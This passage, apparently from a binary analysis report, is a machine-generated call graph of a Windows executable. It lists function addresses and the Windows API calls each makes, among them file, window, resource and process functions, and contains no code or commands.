calls 24365->24638 24367 d58a5f 24366->24367 24370 d589e1 24366->24370 24372 d58ab6 24367->24372 24383 d58a6a 24367->24383 24373 d58a4c 24370->24373 24376 d5a231 3 API calls 24370->24376 24378 d58b14 24370->24378 24371 d59105 24379 d5959a 80 API calls 24371->24379 24372->24373 24641 d57fc0 97 API calls 24372->24641 24374 d58ab4 24373->24374 24373->24378 24375 d5959a 80 API calls 24374->24375 24375->24355 24380 d58a19 24376->24380 24378->24371 24392 d58b82 24378->24392 24642 d598bc 24378->24642 24379->24355 24380->24373 24639 d592a3 97 API calls 24380->24639 24381 d5ab1a 8 API calls 24384 d58bd1 24381->24384 24383->24374 24640 d57db2 101 API calls 24383->24640 24387 d5ab1a 8 API calls 24384->24387 24405 d58be7 24387->24405 24390 d58b70 24646 d56e98 77 API calls 24390->24646 24392->24381 24393 d58cbc 24394 d58e40 24393->24394 24395 d58d18 24393->24395 24398 d58e66 24394->24398 24399 d58e52 24394->24399 24418 d58d49 24394->24418 24396 d58d8a 24395->24396 24397 d58d28 24395->24397 24406 d58167 19 API calls 24396->24406 24401 d58d6e 24397->24401 24409 d58d37 24397->24409 24400 d63377 75 API calls 24398->24400 24402 d59215 123 API calls 24399->24402 24403 d58e7f 24400->24403 24401->24418 24649 d577b8 111 API calls 24401->24649 24402->24418 24652 d63020 123 API calls 24403->24652 24404 d58c93 24404->24393 24647 d59a3c 82 API calls 24404->24647 24405->24393 24405->24404 24412 d5981a 79 API calls 24405->24412 24410 d58dbd 24406->24410 24648 d52021 74 API calls 24409->24648 24414 d58df5 24410->24414 24415 d58de6 24410->24415 24410->24418 24412->24404 24651 d59155 93 API calls __EH_prolog 24414->24651 24650 d57542 85 API calls 24415->24650 24423 d58f85 24418->24423 24653 d52021 74 API calls 24418->24653 24420 d59090 24420->24371 24421 d5a4ed 3 API calls 24420->24421 24424 d590eb 24421->24424 24422 d5903e 24628 d59da2 24422->24628 24423->24371 24423->24420 24423->24422 24627 d59f09 SetEndOfFile 24423->24627 24424->24371 24654 d52021 74 API calls 24424->24654 24427 d59085 24429 d59620 77 API calls 24427->24429 24429->24420 24430 d590fb 24655 d56dcb 76 API calls 24430->24655 24433 d516a4 24432->24433 24671 d5cee1 24433->24671 24437 d59f59 24436->24437 24438 d59f63 24437->24438 24679 d56d0c 78 API calls 24437->24679 24438->24268 24440->24271 24446 d51732 24441->24446 24443 d513d6 24443->24319 24444->24302 24445->24314 24447 d51748 24446->24447 24457 d517a0 __InternalCxxFrameHandler 24446->24457 24448 d51771 24447->24448 24459 d56c36 76 API calls __vswprintf_c_l 24447->24459 24450 d517c7 24448->24450 24455 d5178d ___std_exception_copy 24448->24455 24452 d73e3e 22 API calls 24450->24452 24451 d51767 24460 d56ca7 75 API calls 24451->24460 24454 d517ce 24452->24454 24454->24457 24462 d56ca7 75 API calls 24454->24462 24455->24457 24461 d56ca7 75 API calls 24455->24461 24457->24443 24459->24451 24460->24448 24461->24457 24462->24457 24464 d5cf4d 24463->24464 24466 d5cf54 24463->24466 24465 d5981a 79 API calls 24464->24465 24465->24466 24466->24322 24467->24324 24469 d6de78 24468->24469 24470 d5e617 53 API calls 24469->24470 24471 d6de9b 24470->24471 24472 d54092 _swprintf 51 API calls 24471->24472 24473 d6dead 24472->24473 24474 d6d4d4 16 API calls 24473->24474 24475 d61b7c 24474->24475 24475->24278 24477 d519bf 24476->24477 24479 d519bb 24476->24479 24480 d518f6 24477->24480 24479->24331 24481 d51908 24480->24481 24482 d51945 24480->24482 24483 d53b2d 101 API calls 24481->24483 24488 d53fa3 24482->24488 24487 d51928 24483->24487 24487->24479 24491 d53fac 24488->24491 24489 d53b2d 101 API calls 24489->24491 24491->24489 24492 d51966 24491->24492 24505 d60e08 24491->24505 24492->24487 24493 d51e50 24492->24493 24494 d51e5a __EH_prolog 24493->24494 24513 d53bba 24494->24513 24496 d51e84 24497 d51732 78 API calls 24496->24497 24504 d51f0b 24496->24504 24498 d51e9b 24497->24498 24541 d518a9 78 API calls 24498->24541 24500 d51eb3 24502 d51ebf _wcslen 24500->24502 24542 d61b84 MultiByteToWideChar 24500->24542 24543 d518a9 78 API calls 24502->24543 24504->24487 24506 d60e0f 24505->24506 24507 d60e2a 24506->24507 24511 d56c31 RaiseException _com_raise_error 24506->24511 24509 d60e3b SetThreadExecutionState 24507->24509 24512 d56c31 RaiseException _com_raise_error 24507->24512 24509->24491 24511->24507 24512->24509 24514 d53bc4 __EH_prolog 24513->24514 24515 d53bf6 24514->24515 24516 d53bda 24514->24516 24518 d53e51 24515->24518 24521 d53c22 24515->24521 24569 d5138b 74 API calls 24516->24569 24586 d5138b 74 API calls 24518->24586 24520 d53be5 24520->24496 24521->24520 24544 d63377 24521->24544 24523 d53ca3 24525 d53d2e 24523->24525 24540 d53c9a 24523->24540 24572 d5d051 24523->24572 24524 d53c9f 24524->24523 24571 d520bd 78 API calls 24524->24571 24554 d5ab1a 24525->24554 24527 d53c71 24527->24523 24527->24524 24528 d53c8f 24527->24528 24570 d5138b 74 API calls 24528->24570 24530 d53d41 24534 d53dd7 24530->24534 24535 d53dc7 24530->24535 24578 d63020 123 API calls 24534->24578 24558 d59215 24535->24558 24538 d53dd5 24538->24540 24579 d52021 74 API calls 24538->24579 24580 d62297 24540->24580 24541->24500 24542->24502 24543->24504 24545 d6338c 24544->24545 24547 d63396 ___std_exception_copy 24544->24547 24587 d56ca7 75 API calls 24545->24587 24548 d634c6 24547->24548 24549 d6341c 24547->24549 24552 d63440 _abort 24547->24552 24589 d7238d RaiseException 24548->24589 24588 d632aa 75 API calls 3 library calls 24549->24588 24552->24527 24553 d634f2 24555 d5ab28 24554->24555 24557 d5ab32 24554->24557 24556 d6eb38 8 API calls 24555->24556 24556->24557 24557->24530 24559 d5921f __EH_prolog 24558->24559 24590 d57c64 24559->24590 24562 d513ba 78 API calls 24563 d59231 24562->24563 24593 d5d114 24563->24593 24565 d59243 24566 d5928a 24565->24566 24568 d5d114 118 API calls 24565->24568 24602 d5d300 97 API calls __InternalCxxFrameHandler 24565->24602 24566->24538 24568->24565 24569->24520 24570->24540 24571->24523 24573 d5d084 24572->24573 24574 d5d072 24572->24574 24604 d5603a 82 API calls 24573->24604 24603 d5603a 82 API calls 24574->24603 24577 d5d07c 24577->24525 24578->24538 24579->24540 24581 d622a1 24580->24581 24582 d622ba 24581->24582 24585 d622ce 24581->24585 24605 d60eed 86 API calls 24582->24605 24584 d622c1 24584->24585 24586->24520 24587->24547 24588->24552 24589->24553 24591 d5b146 GetVersionExW 24590->24591 24592 d57c69 24591->24592 24592->24562 24599 d5d12a __InternalCxxFrameHandler 24593->24599 24594 d5d29a 24595 d5d2ce 24594->24595 24596 d5d0cb 6 API calls 24594->24596 24597 d60e08 SetThreadExecutionState RaiseException 24595->24597 24596->24595 24600 d5d291 24597->24600 24598 d68c8d 103 API calls 24598->24599 24599->24594 24599->24598 24599->24600 24601 d5ac05 91 API calls 24599->24601 24600->24565 24601->24599 24602->24565 24603->24577 24604->24577 24605->24584 24606->24341 24607->24341 24608->24339 24610 d55d2a 24609->24610 24656 d55c4b 24610->24656 24612 d55d95 24612->24356 24613 d55d5d 24613->24612 24661 d5b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24613->24661 24617 d58186 24615->24617 24616 d58232 24667 d61fac CharUpperW 24616->24667 24617->24616 24668 d5be5e 19 API calls __InternalCxxFrameHandler 24617->24668 24620 d5823b 24620->24359 24622 d57c22 24621->24622 24623 d57c5a 24622->24623 24669 d56e7a 74 API calls 24622->24669 24623->24364 24625 d57c52 24670 d5138b 74 API calls 24625->24670 24627->24422 24629 d59db3 24628->24629 24632 d59dc2 24628->24632 24630 d59db9 FlushFileBuffers 24629->24630 24629->24632 24630->24632 24631 d59e3f SetFileTime 24631->24427 24632->24631 24633->24348 24634->24355 24635->24355 24636->24364 24637->24364 24638->24366 24639->24373 24640->24374 24641->24373 24643 d598c5 GetFileType 24642->24643 24644 d58b5a 24642->24644 24643->24644 24644->24392 24645 d52021 74 API calls 24644->24645 24645->24390 24646->24392 24647->24393 24648->24418 24649->24418 24650->24418 24651->24418 24652->24418 24653->24423 24654->24430 24655->24371 24662 d55b48 24656->24662 24659 d55b48 2 API calls 24660 d55c6c 24659->24660 24660->24613 24661->24613 24663 d55b52 24662->24663 24665 d55c3a 24663->24665 24666 d5b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24663->24666 24665->24659 24665->24660 24666->24663 24667->24620 24668->24616 24669->24625 24670->24623 24674 d5cef2 24671->24674 24673 d5cf24 24678 d5a99e 86 API calls 24673->24678 24677 d5a99e 86 API calls 24674->24677 24676 d5cf2f 24677->24673 24678->24676 24679->24438 24681 d5a6a8 24680->24681 24682 d5a727 FindNextFileW 24681->24682 24683 d5a6c1 FindFirstFileW 24681->24683 24684 d5a709 24682->24684 24685 d5a732 GetLastError 24682->24685 24683->24684 24686 d5a6d0 24683->24686 24684->24290 24685->24684 24687 d5bb03 GetCurrentDirectoryW 24686->24687 24688 d5a6e0 24687->24688 24689 d5a6e4 FindFirstFileW 24688->24689 24690 d5a6fe GetLastError 24688->24690 24689->24684 24689->24690 24690->24684 24700 d6a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24691->24700 24693 d6a5cd 24694 d6a5d9 24693->24694 24701 d6a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24693->24701 24694->24088 24694->24089 24696->24092 24697->24098 24698->24098 24699->24101 24700->24693 24701->24694 24702->24109 24704 d59f42 78 API calls 24703->24704 24705 d51fe8 24704->24705 24706 d51a04 101 API calls 24705->24706 24709 d52005 24705->24709 24707 d51ff5 24706->24707 24707->24709 24710 d5138b 74 API calls 24707->24710 24709->24117 24709->24118 24710->24709 25355 d694e0 GetClientRect 25390 d621e0 26 API calls std::bad_exception::bad_exception 25416 d6f2e0 46 API calls __RTC_Initialize 25417 d7bee0 GetCommandLineA GetCommandLineW 25391 d5f1e8 FreeLibrary 25357 d7b49d 6 API calls _ValidateLocalCookies 25418 d6c793 102 API calls 4 library calls 25392 d69580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25393 d6b18d 78 API calls 25359 d6c793 97 API calls 4 library calls 24733 d6f3b2 24734 d6f3be __FrameHandler3::FrameUnwindToState 24733->24734 24765 d6eed7 24734->24765 24736 d6f3c5 24737 d6f518 24736->24737 24740 d6f3ef 24736->24740 24838 d6f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24737->24838 24739 d6f51f 24831 d77f58 24739->24831 24751 d6f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24740->24751 24776 d78aed 24740->24776 24747 d6f40e 24749 d6f48f 24784 d6f953 GetStartupInfoW _abort 24749->24784 24751->24749 24834 d77af4 38 API calls _abort 24751->24834 24752 d6f495 24785 d78a3e 51 API calls 24752->24785 24755 d6f49d 24786 d6df1e 24755->24786 24759 d6f4b1 24759->24739 24760 d6f4b5 24759->24760 24761 d6f4be 24760->24761 24836 d77efb 28 API calls _abort 24760->24836 24837 d6f048 12 API calls ___scrt_uninitialize_crt 24761->24837 24764 d6f4c6 24764->24747 24766 d6eee0 24765->24766 24840 d6f654 IsProcessorFeaturePresent 24766->24840 24768 d6eeec 24841 d72a5e 24768->24841 24770 d6eef1 24775 d6eef5 24770->24775 24849 d78977 24770->24849 24773 d6ef0c 24773->24736 24775->24736 24779 d78b04 24776->24779 24777 d6fbbc _ValidateLocalCookies 5 API calls 24778 d6f408 24777->24778 24778->24747 24780 d78a91 24778->24780 24779->24777 24781 d78ac0 24780->24781 24782 d6fbbc _ValidateLocalCookies 5 API calls 24781->24782 24783 d78ae9 24782->24783 24783->24751 24784->24752 24785->24755 24942 d60863 24786->24942 24790 d6df3d 24991 d6ac16 24790->24991 24792 d6df46 _abort 24793 d6df59 GetCommandLineW 24792->24793 24794 d6dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24793->24794 24795 d6df68 24793->24795 24796 d54092 _swprintf 51 API calls 24794->24796 25025 d6c5c4 83 API calls 24795->25025 24798 d6e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24796->24798 24995 d6b6dd LoadBitmapW 24798->24995 24799 d6df6e 24801 d6df76 OpenFileMappingW 24799->24801 24802 d6dfe0 24799->24802 24804 d6dfd6 CloseHandle 24801->24804 24805 d6df8f MapViewOfFile 24801->24805 25027 d6dbde SetEnvironmentVariableW SetEnvironmentVariableW 24802->25027 24804->24794 24808 d6dfa0 __InternalCxxFrameHandler 24805->24808 24809 d6dfcd UnmapViewOfFile 24805->24809 25026 d6dbde SetEnvironmentVariableW SetEnvironmentVariableW 24808->25026 24809->24804 24814 d690b7 8 API calls 24816 d6e0aa DialogBoxParamW 24814->24816 24815 d6dfbc 24815->24809 24817 d6e0e4 24816->24817 24818 d6e0f6 Sleep 24817->24818 24819 d6e0fd 24817->24819 24818->24819 24821 d6e10b 24819->24821 25028 d6ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24819->25028 24822 d6e12a DeleteObject 24821->24822 24823 d6e146 24822->24823 24824 d6e13f DeleteObject 24822->24824 24825 d6e177 24823->24825 24826 d6e189 24823->24826 24824->24823 25029 d6dc3b 6 API calls 24825->25029 25022 d6ac7c 24826->25022 24828 d6e17d CloseHandle 24828->24826 24830 d6e1c3 24835 d6f993 GetModuleHandleW 24830->24835 25158 d77cd5 24831->25158 24834->24749 24835->24759 24836->24761 24837->24764 24838->24739 24840->24768 24853 d73b07 24841->24853 24844 d72a67 24844->24770 24846 d72a6f 24847 d72a7a 24846->24847 24867 d73b43 DeleteCriticalSection 24846->24867 24847->24770 24896 d7c05a 24849->24896 24852 d72a7d 7 API calls 2 library calls 24852->24775 24854 d73b10 24853->24854 24856 d73b39 24854->24856 24857 d72a63 24854->24857 24868 d73d46 24854->24868 24873 d73b43 DeleteCriticalSection 24856->24873 24857->24844 24859 d72b8c 24857->24859 24889 d73c57 24859->24889 24862 d72ba1 24862->24846 24864 d72baf 24865 d72bbc 24864->24865 24895 d72bbf 6 API calls ___vcrt_FlsFree 24864->24895 24865->24846 24867->24844 24874 d73c0d 24868->24874 24871 d73d7e InitializeCriticalSectionAndSpinCount 24872 d73d69 24871->24872 24872->24854 24873->24857 24875 d73c26 24874->24875 24876 d73c4f 24874->24876 24875->24876 24881 d73b72 24875->24881 24876->24871 24876->24872 24879 d73c3b GetProcAddress 24879->24876 24880 d73c49 24879->24880 24880->24876 24886 d73b7e ___vcrt_InitializeCriticalSectionEx 24881->24886 24882 d73bf3 24882->24876 24882->24879 24883 d73b95 LoadLibraryExW 24884 d73bb3 GetLastError 24883->24884 24885 d73bfa 24883->24885 24884->24886 24885->24882 24887 d73c02 FreeLibrary 24885->24887 24886->24882 24886->24883 24888 d73bd5 LoadLibraryExW 24886->24888 24887->24882 24888->24885 24888->24886 24890 d73c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 24889->24890 24891 d73c71 24890->24891 24892 d73c8a TlsAlloc 24891->24892 24893 d72b96 24891->24893 24893->24862 24894 d73d08 6 API calls ___vcrt_InitializeCriticalSectionEx 24893->24894 24894->24864 24895->24862 24899 d7c077 24896->24899 24900 d7c073 24896->24900 24897 d6fbbc _ValidateLocalCookies 5 API calls 24898 d6eefe 24897->24898 24898->24773 24898->24852 24899->24900 24902 d7a6a0 24899->24902 24900->24897 24903 d7a6ac __FrameHandler3::FrameUnwindToState 24902->24903 24914 d7ac31 EnterCriticalSection 24903->24914 24905 d7a6b3 24915 d7c528 24905->24915 24907 d7a6c2 24913 d7a6d1 24907->24913 24928 d7a529 29 API calls 24907->24928 24910 d7a6cc 24929 d7a5df GetStdHandle GetFileType 24910->24929 24911 d7a6e2 _abort 24911->24899 24930 d7a6ed LeaveCriticalSection _abort 24913->24930 24914->24905 24916 d7c534 __FrameHandler3::FrameUnwindToState 24915->24916 24917 d7c541 24916->24917 24918 d7c558 24916->24918 24939 d791a8 20 API calls _abort 24917->24939 24931 d7ac31 EnterCriticalSection 24918->24931 24921 d7c546 24940 d79087 26 API calls ___std_exception_copy 24921->24940 24923 d7c590 24941 d7c5b7 LeaveCriticalSection _abort 24923->24941 24924 d7c550 _abort 24924->24907 24925 d7c564 24925->24923 24932 d7c479 24925->24932 24928->24910 24929->24913 24930->24911 24931->24925 24933 d7b136 _abort 20 API calls 24932->24933 24935 d7c48b 24933->24935 24934 d7c498 24936 d78dcc _free 20 API calls 24934->24936 24935->24934 24937 d7af0a 11 API calls 24935->24937 24938 d7c4ea 24936->24938 24937->24935 24938->24925 24939->24921 24940->24924 24941->24924 24943 d6ec50 24942->24943 24944 d6086d GetModuleHandleW 24943->24944 24945 d60888 GetProcAddress 24944->24945 24947 d608e7 24944->24947 24948 d608a1 24945->24948 24949 d608b9 GetProcAddress 24945->24949 24946 d60c14 GetModuleFileNameW 24958 d60c32 24946->24958 24947->24946 25039 d775fb 42 API calls 2 library calls 24947->25039 24948->24949 24951 d608cb 24949->24951 24951->24947 24952 d60b54 24952->24946 24953 d60b5f GetModuleFileNameW CreateFileW 24952->24953 24954 d60b8f SetFilePointer 24953->24954 24955 d60c08 CloseHandle 24953->24955 24954->24955 24956 d60b9d ReadFile 24954->24956 24955->24946 24956->24955 24959 d60bbb 24956->24959 24961 d60c94 GetFileAttributesW 24958->24961 24962 d60cac 24958->24962 24964 d60c5d CompareStringW 24958->24964 25030 d5b146 24958->25030 25033 d6081b 24958->25033 24959->24955 24963 d6081b 2 API calls 24959->24963 24961->24958 24961->24962 24965 d60cb7 24962->24965 24968 d60cec 24962->24968 24963->24959 24964->24958 24967 d60cd0 GetFileAttributesW 24965->24967 24970 d60ce8 24965->24970 24966 d60dfb 24990 d6a64d GetCurrentDirectoryW 24966->24990 24967->24965 24967->24970 24968->24966 24969 d5b146 GetVersionExW 24968->24969 24971 d60d06 24969->24971 24970->24968 24972 d60d73 24971->24972 24973 d60d0d 24971->24973 24974 d54092 _swprintf 51 API calls 24972->24974 24975 d6081b 2 API calls 24973->24975 24976 d60d9b AllocConsole 24974->24976 24977 d60d17 24975->24977 24978 d60df3 ExitProcess 24976->24978 24979 d60da8 GetCurrentProcessId AttachConsole 24976->24979 24980 d6081b 2 API calls 24977->24980 25040 d73e13 24979->25040 24982 d60d21 24980->24982 24984 d5e617 53 API calls 24982->24984 24983 d60dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24983->24978 24985 d60d3c 24984->24985 24986 d54092 _swprintf 51 API calls 24985->24986 24987 d60d4f 24986->24987 24988 d5e617 53 API calls 24987->24988 24989 d60d5e 24988->24989 24989->24978 24990->24790 24992 d6081b 2 API calls 24991->24992 24993 d6ac2a OleInitialize 24992->24993 24994 d6ac4d GdiplusStartup SHGetMalloc 24993->24994 24994->24792 24996 d6b6fe 24995->24996 24997 d6b70b GetObjectW 24995->24997 25042 d6a6c2 FindResourceW 24996->25042 24998 d6b71a 24997->24998 25000 d6a5c6 4 API calls 24998->25000 25002 d6b72d 25000->25002 25003 d6b770 25002->25003 25004 d6b74c 25002->25004 25005 d6a6c2 12 API calls 25002->25005 25014 d5da42 25003->25014 25056 d6a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25004->25056 25007 d6b73d 25005->25007 25007->25004 25009 d6b743 DeleteObject 25007->25009 25008 d6b754 25057 d6a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25008->25057 25009->25004 25011 d6b75d 25058 d6a80c 8 API calls 25011->25058 25013 d6b764 DeleteObject 25013->25003 25067 d5da67 25014->25067 25019 d690b7 25020 d6eb38 8 API calls 25019->25020 25021 d690d6 25020->25021 25021->24814 25023 d6acab GdiplusShutdown OleUninitialize 25022->25023 25023->24830 25025->24799 25026->24815 25027->24794 25028->24821 25029->24828 25031 d5b196 25030->25031 25032 d5b15a GetVersionExW 25030->25032 25031->24958 25032->25031 25034 d6ec50 25033->25034 25035 d60828 GetSystemDirectoryW 25034->25035 25036 d60840 25035->25036 25037 d6085e 25035->25037 25038 d60851 LoadLibraryW 25036->25038 25037->24958 25038->25037 25039->24952 25041 d73e1b 25040->25041 25041->24983 25041->25041 25043 d6a6e5 SizeofResource 25042->25043 25044 d6a7d3 25042->25044 25043->25044 25045 d6a6fc LoadResource 25043->25045 25044->24997 25044->24998 25045->25044 25046 d6a711 LockResource 25045->25046 25046->25044 25047 d6a722 GlobalAlloc 25046->25047 25047->25044 25048 d6a73d GlobalLock 25047->25048 25049 d6a7cc GlobalFree 25048->25049 25050 d6a74c __InternalCxxFrameHandler 25048->25050 25049->25044 25051 d6a7c5 GlobalUnlock 25050->25051 25059 d6a626 GdipAlloc 25050->25059 25051->25049 25054 d6a7b0 25054->25051 25055 d6a79a GdipCreateHBITMAPFromBitmap 25055->25054 25056->25008 25057->25011 25058->25013 25060 d6a645 25059->25060 25061 d6a638 25059->25061 25060->25051 25060->25054 25060->25055 25063 d6a3b9 25061->25063 25064 d6a3e1 GdipCreateBitmapFromStream 25063->25064 25065 d6a3da GdipCreateBitmapFromStreamICM 25063->25065 25066 d6a3e6 25064->25066 25065->25066 25066->25060 25068 d5da75 __EH_prolog 25067->25068 25069 d5daa4 GetModuleFileNameW 25068->25069 25070 d5dad5 25068->25070 25071 d5dabe 25069->25071 25113 d598e0 25070->25113 25071->25070 25073 d5db31 25124 d76310 25073->25124 25074 d5959a 80 API calls 25076 d5da4e 25074->25076 25111 d5e29e GetModuleHandleW FindResourceW 25076->25111 25077 d5db44 25079 d76310 26 API calls 25077->25079 25078 d5db05 25078->25073 25080 d5e261 78 API calls 25078->25080 25091 d5dd4a 25078->25091 25088 d5db56 ___vcrt_InitializeCriticalSectionEx 25079->25088 25080->25078 25081 d5dc85 25081->25091 25144 d59d70 81 API calls 25081->25144 25083 d59e80 79 API calls 25083->25088 25085 d5dc9f ___std_exception_copy 25086 d59bd0 82 API calls 25085->25086 25085->25091 25089 d5dcc8 ___std_exception_copy 25086->25089 25088->25081 25088->25083 25088->25091 25138 d59bd0 25088->25138 25143 d59d70 81 API calls 25088->25143 25089->25091 25108 d5dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25089->25108 25145 d61b84 MultiByteToWideChar 25089->25145 25091->25074 25092 d5e159 25097 d5e1de 25092->25097 25151 d78cce 26 API calls ___std_exception_copy 25092->25151 25095 d5e16e 25152 d77625 26 API calls ___std_exception_copy 25095->25152 25096 d5e214 25102 d76310 26 API calls 25096->25102 25097->25096 25101 d5e261 78 API calls 25097->25101 25099 d5e1c6 25153 d5e27c 78 API calls 25099->25153 25101->25097 25103 d5e22d 25102->25103 25104 d76310 26 API calls 25103->25104 25104->25091 25106 d61da7 WideCharToMultiByte 25106->25108 25108->25091 25108->25092 25108->25106 25146 d5e5b1 50 API calls __vsnprintf 25108->25146 25147 d76159 26 API calls 3 library calls 25108->25147 25148 d78cce 26 API calls ___std_exception_copy 25108->25148 25149 d77625 26 API calls ___std_exception_copy 25108->25149 25150 d5e27c 78 API calls 25108->25150 25112 d5da55 25111->25112 25112->25019 25114 d598ea 25113->25114 25115 d5994b CreateFileW 25114->25115 25116 d5996c GetLastError 25115->25116 25120 d599bb 25115->25120 25117 d5bb03 GetCurrentDirectoryW 25116->25117 25118 d5998c 25117->25118 25119 d59990 CreateFileW GetLastError 25118->25119 25118->25120 25119->25120 25121 d599b5 25119->25121 25122 d599e5 SetFileTime 25120->25122 25123 d599ff 25120->25123 25121->25120 25122->25123 25123->25078 25125 d76349 25124->25125 25126 d7634d 25125->25126 25137 d76375 25125->25137 25154 d791a8 20 API calls _abort 25126->25154 25128 d76352 25155 d79087 26 API calls ___std_exception_copy 25128->25155 25130 d6fbbc _ValidateLocalCookies 5 API calls 25132 d766a6 25130->25132 25131 d7635d 25133 d6fbbc _ValidateLocalCookies 5 API calls 25131->25133 25132->25077 25135 d76369 25133->25135 25135->25077 25136 d76699 25136->25130 25137->25136 25156 d76230 5 API calls _ValidateLocalCookies 25137->25156 25139 d59be3 25138->25139 25140 d59bdc 25138->25140 25139->25140 25142 d59785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25139->25142 25157 d56d1a 77 API calls 25139->25157 25140->25088 25142->25139 25143->25088 25144->25085 25145->25108 25146->25108 25147->25108 25148->25108 25149->25108 25150->25108 25151->25095 25152->25099 25153->25097 25154->25128 25155->25131 25156->25137 25157->25139 25159 d77ce1 _abort 25158->25159 25160 d77cfa 25159->25160 25161 d77ce8 25159->25161 25182 d7ac31 EnterCriticalSection 25160->25182 25194 d77e2f GetModuleHandleW 25161->25194 25164 d77ced 25164->25160 25195 d77e73 GetModuleHandleExW 25164->25195 25167 d77d01 25178 d77d9f 25167->25178 25180 d77d76 25167->25180 25203 d787e0 20 API calls _abort 25167->25203 25170 d77dbc 25186 d77dee 25170->25186 25171 d77de8 25204 d82390 5 API calls _ValidateLocalCookies 25171->25204 25172 d78a91 _abort 5 API calls 25172->25178 25176 d78a91 _abort 5 API calls 25177 d77d8e 25176->25177 25177->25172 25183 d77ddf 25178->25183 25180->25176 25180->25177 25182->25167 25205 d7ac81 LeaveCriticalSection 25183->25205 25185 d77db8 25185->25170 25185->25171 25206 d7b076 25186->25206 25189 d77e1c 25192 d77e73 _abort 8 API calls 25189->25192 25190 d77dfc GetPEB 25190->25189 25191 d77e0c GetCurrentProcess TerminateProcess 25190->25191 25191->25189 25193 d77e24 ExitProcess 25192->25193 25194->25164 25196 d77ec0 25195->25196 25197 d77e9d GetProcAddress 25195->25197 25198 d77ec6 FreeLibrary 25196->25198 25199 d77ecf 25196->25199 25202 d77eb2 25197->25202 25198->25199 25200 d6fbbc _ValidateLocalCookies 5 API calls 25199->25200 25201 d77cf9 25200->25201 25201->25160 25202->25196 25203->25180 25205->25185 25207 d7b091 25206->25207 25208 d7b09b 25206->25208 25210 d6fbbc _ValidateLocalCookies 5 API calls 25207->25210 25209 d7ac98 _abort 5 API calls 25208->25209 25209->25207 25211 d77df8 25210->25211 25211->25189 25211->25190 25395 d6b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25435 d61bbd GetCPInfo IsDBCSLeadByte 25397 d6eda7 48 API calls _unexpected 25436 d6f3a0 27 API calls 25363 d7a4a0 71 API calls _free 25364 d6dca1 DialogBoxParamW 25365 d808a0 IsProcessorFeaturePresent 25437 d56faa 111 API calls 3 library calls 25366 d6e455 14 API calls ___delayLoadHelper2@8 23505 d7c051 31 API calls _ValidateLocalCookies 23510 d6cd58 23512 d6ce22 23510->23512 23518 d6cd7b 23510->23518 23524 d6c793 _wcslen _wcsrchr 23512->23524 23538 d6d78f 23512->23538 23514 d6d40a 23516 d61fbb CompareStringW 23516->23518 23517 d6ca67 SetWindowTextW 23517->23524 23518->23512 23518->23516 23523 d6c855 SetFileAttributesW 23525 d6c90f GetFileAttributesW 23523->23525 23526 d6c86f _abort _wcslen 23523->23526 23524->23514 23524->23517 23524->23523 23530 d6cc31 GetDlgItem SetWindowTextW SendMessageW 23524->23530 23533 d6cc71 SendMessageW 23524->23533 23537 d61fbb CompareStringW 23524->23537 23562 d6b314 23524->23562 23566 d6a64d GetCurrentDirectoryW 23524->23566 23571 d5a5d1 6 API calls 23524->23571 23572 d5a55a FindClose 23524->23572 23573 d6b48e 76 API calls 2 library calls 23524->23573 23574 d73e3e 23524->23574 23525->23524 23529 d6c921 DeleteFileW 23525->23529 23526->23524 23526->23525 23567 d5b991 51 API calls 2 library calls 23526->23567 23529->23524 23531 d6c932 23529->23531 23530->23524 23568 d54092 23531->23568 23533->23524 23535 d6c967 MoveFileW 23535->23524 23536 d6c97f MoveFileExW 23535->23536 23536->23524 23537->23524 23541 d6d799 _abort _wcslen 23538->23541 23539 d6d9e7 23539->23524 23540 d6d8a5 23587 d5a231 23540->23587 23541->23539 23541->23540 23542 d6d9c0 23541->23542 23590 d61fbb CompareStringW 23541->23590 23542->23539 23546 d6d9de ShowWindow 23542->23546 23546->23539 23547 d6d8d9 ShellExecuteExW 23547->23539 23554 d6d8ec 23547->23554 23549 d6d8d1 23549->23547 23550 d6d925 23592 d6dc3b 6 API calls 23550->23592 23551 d6d97b CloseHandle 23552 d6d994 23551->23552 23553 d6d989 23551->23553 23552->23542 23593 d61fbb CompareStringW 23553->23593 23554->23550 23554->23551 23556 d6d91b ShowWindow 23554->23556 23556->23550 23558 d6d93d 23558->23551 23559 d6d950 GetExitCodeProcess 23558->23559 23559->23551 23560 d6d963 23559->23560 23560->23551 23563 d6b31e 23562->23563 23564 d6b40d 23563->23564 23565 d6b3f0 ExpandEnvironmentStringsW 23563->23565 23564->23524 23565->23564 23566->23524 23567->23526 23608 d54065 23568->23608 23571->23524 23572->23524 23573->23524 23575 d78e54 23574->23575 23576 d78e61 23575->23576 23577 d78e6c 23575->23577 23695 d78e06 23576->23695 23579 d78e74 23577->23579 23586 d78e7d _abort 23577->23586 23580 d78dcc _free 20 API calls 23579->23580 23584 d78e69 23580->23584 23581 d78ea7 HeapReAlloc 23581->23584 23581->23586 23582 d78e82 23702 d791a8 20 API calls _abort 23582->23702 23584->23524 23586->23581 23586->23582 23703 d77a5e 7 API calls 2 library calls 23586->23703 23594 d5a243 23587->23594 23590->23540 23591 d5b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23591->23549 23592->23558 23593->23552 23602 d6ec50 23594->23602 23597 d5a261 23604 d5bb03 23597->23604 23598 d5a23a 23598->23547 23598->23591 23600 d5a275 23600->23598 23601 d5a279 GetFileAttributesW 23600->23601 23601->23598 23603 d5a250 GetFileAttributesW 23602->23603 23603->23597 23603->23598 23605 d5bb10 _wcslen 23604->23605 23606 d5bbb8 